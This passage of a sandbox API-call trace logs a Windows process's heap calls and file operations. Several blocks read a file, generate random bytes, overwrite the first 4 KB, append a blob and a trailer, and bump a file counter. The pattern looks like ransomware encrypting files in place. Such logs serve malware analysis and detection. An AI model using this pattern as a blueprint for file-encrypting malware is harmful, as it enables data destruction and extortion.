hHeap=0x4f10000) returned 1 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.166] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.166] GetProcessHeap () returned 0x4f10000 [0085.167] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.167] GetProcessHeap () returned 0x4f10000 [0085.167] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.167] GetProcessHeap () returned 0x4f10000 [0085.167] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.167] GetProcessHeap () returned 0x4f10000 [0085.167] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.167] GetProcessHeap () returned 0x4f10000 [0085.167] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.167] GetProcessHeap () returned 0x4f10000 [0085.167] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.167] GetProcessHeap () returned 0x4f10000 [0085.167] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.167] GetProcessHeap () returned 0x4f10000 [0085.167] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.167] GetProcessHeap () returned 0x4f10000 [0085.167] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.167] GetProcessHeap () returned 0x4f10000 [0085.167] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.167] GetProcessHeap () returned 0x4f10000 [0085.167] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.167] GetProcessHeap () returned 0x4f10000 [0085.167] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.167] GetProcessHeap () returned 0x4f10000 [0085.167] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.167] GetProcessHeap () returned 0x4f10000 [0085.167] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.168] GetProcessHeap () returned 0x4f10000 [0085.168] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.168] GetProcessHeap () returned 0x4f10000 [0085.168] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.168] GetProcessHeap () returned 0x4f10000 [0085.168] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.168] GetProcessHeap () returned 0x4f10000 [0085.168] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.168] GetProcessHeap () returned 0x4f10000 [0085.168] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.168] GetProcessHeap () returned 0x4f10000 [0085.168] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.168] GetProcessHeap () returned 0x4f10000 [0085.168] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.168] GetProcessHeap () returned 0x4f10000 [0085.168] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.168] GetProcessHeap () returned 0x4f10000 [0085.168] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.168] GetProcessHeap () returned 0x4f10000 [0085.168] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.168] GetProcessHeap () returned 0x4f10000 [0085.168] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0085.168] GetProcessHeap () returned 0x4f10000 [0085.168] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.168] GetProcessHeap () returned 0x4f10000 [0085.168] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.168] SetFilePointerEx (in: hFile=0x9b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.168] WriteFile (in: hFile=0x9b0, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.169] WriteFile (in: hFile=0x9b0, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.169] GetProcessHeap () returned 0x4f10000 [0085.169] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.169] GetProcessHeap () returned 0x4f10000 [0085.169] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.169] GetProcessHeap () returned 0x4f10000 [0085.169] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.169] CloseHandle (hObject=0x9b0) returned 1 [0085.174] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 142 [0085.174] SetFilePointerEx (in: hFile=0x9b4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.174] ReadFile (in: hFile=0x9b4, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.174] SetFilePointerEx (in: hFile=0x9b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.174] GetProcessHeap () returned 0x4f10000 [0085.174] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.174] GetProcessHeap () returned 0x4f10000 [0085.174] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.174] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.174] GetProcessHeap () returned 0x4f10000 [0085.174] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.174] ReadFile (in: hFile=0x9b4, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0085.223] SetFilePointerEx (in: hFile=0x9b4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.223] WriteFile (in: hFile=0x9b4, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0085.223] GetProcessHeap () returned 0x4f10000 [0085.223] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.223] GetProcessHeap () returned 0x4f10000 [0085.223] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.223] GetProcessHeap () returned 0x4f10000 [0085.223] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.223] GetProcessHeap () returned 0x4f10000 [0085.223] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.223] GetProcessHeap () returned 0x4f10000 [0085.223] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.223] GetProcessHeap () returned 0x4f10000 [0085.223] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.223] GetProcessHeap () returned 0x4f10000 [0085.223] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.223] GetProcessHeap () returned 0x4f10000 [0085.223] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.223] GetProcessHeap () returned 0x4f10000 [0085.223] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.223] GetProcessHeap () returned 0x4f10000 [0085.223] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.223] GetProcessHeap () returned 0x4f10000 [0085.223] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.223] GetProcessHeap () returned 0x4f10000 [0085.224] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.224] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.224] GetProcessHeap () returned 0x4f10000 [0085.225] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.225] GetProcessHeap () returned 0x4f10000 [0085.225] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.226] GetProcessHeap () returned 0x4f10000 [0085.226] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.226] GetProcessHeap () returned 0x4f10000 [0085.226] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.226] GetProcessHeap () returned 0x4f10000 [0085.226] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.226] GetProcessHeap () returned 0x4f10000 [0085.226] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.226] GetProcessHeap () returned 0x4f10000 [0085.226] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.226] GetProcessHeap () returned 0x4f10000 [0085.226] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.226] GetProcessHeap () returned 0x4f10000 [0085.226] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.226] GetProcessHeap () returned 0x4f10000 [0085.226] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.226] GetProcessHeap () returned 0x4f10000 [0085.226] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.226] GetProcessHeap () returned 0x4f10000 [0085.226] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.226] GetProcessHeap () returned 0x4f10000 [0085.226] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.226] GetProcessHeap () returned 0x4f10000 [0085.226] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.226] GetProcessHeap () returned 0x4f10000 [0085.226] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.226] GetProcessHeap () returned 0x4f10000 [0085.226] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.227] GetProcessHeap () returned 0x4f10000 [0085.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.227] GetProcessHeap () returned 0x4f10000 [0085.227] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.227] GetProcessHeap () returned 0x4f10000 [0085.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.227] GetProcessHeap () returned 0x4f10000 [0085.227] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.227] GetProcessHeap () returned 0x4f10000 [0085.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.227] GetProcessHeap () returned 0x4f10000 [0085.227] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.227] GetProcessHeap () returned 0x4f10000 [0085.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.227] GetProcessHeap () returned 0x4f10000 [0085.227] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.227] GetProcessHeap () returned 0x4f10000 [0085.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.227] GetProcessHeap () returned 0x4f10000 [0085.227] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.227] GetProcessHeap () returned 0x4f10000 [0085.227] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.227] GetProcessHeap () returned 0x4f10000 [0085.231] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.231] GetProcessHeap () returned 0x4f10000 [0085.231] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.231] GetProcessHeap () returned 0x4f10000 [0085.231] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0085.231] GetProcessHeap () returned 0x4f10000 [0085.231] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.231] GetProcessHeap () returned 0x4f10000 [0085.231] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.231] SetFilePointerEx (in: hFile=0x9b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.232] WriteFile (in: hFile=0x9b4, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.232] WriteFile (in: hFile=0x9b4, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.232] GetProcessHeap () returned 0x4f10000 [0085.232] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.232] GetProcessHeap () returned 0x4f10000 [0085.232] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.232] GetProcessHeap () returned 0x4f10000 [0085.232] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.232] CloseHandle (hObject=0x9b4) returned 1 [0085.234] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 143 [0085.234] SetFilePointerEx (in: hFile=0x9b8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.234] ReadFile (in: hFile=0x9b8, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.234] SetFilePointerEx (in: hFile=0x9b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.234] GetProcessHeap () returned 0x4f10000 [0085.234] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.234] GetProcessHeap () returned 0x4f10000 [0085.234] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.234] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.234] GetProcessHeap () returned 0x4f10000 [0085.234] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.234] ReadFile (in: hFile=0x9b8, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0085.282] SetFilePointerEx (in: hFile=0x9b8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.283] WriteFile (in: hFile=0x9b8, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0085.283] GetProcessHeap () returned 0x4f10000 [0085.283] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.283] GetProcessHeap () returned 0x4f10000 [0085.283] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.283] GetProcessHeap () returned 0x4f10000 [0085.283] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.283] GetProcessHeap () returned 0x4f10000 [0085.283] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.283] GetProcessHeap () returned 0x4f10000 [0085.283] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.283] GetProcessHeap () returned 0x4f10000 [0085.283] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.283] GetProcessHeap () returned 0x4f10000 [0085.283] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.283] GetProcessHeap () returned 0x4f10000 [0085.283] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.283] GetProcessHeap () returned 0x4f10000 [0085.283] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.283] GetProcessHeap () returned 0x4f10000 [0085.283] HeapFree (in: hHeap=0x4f10000, 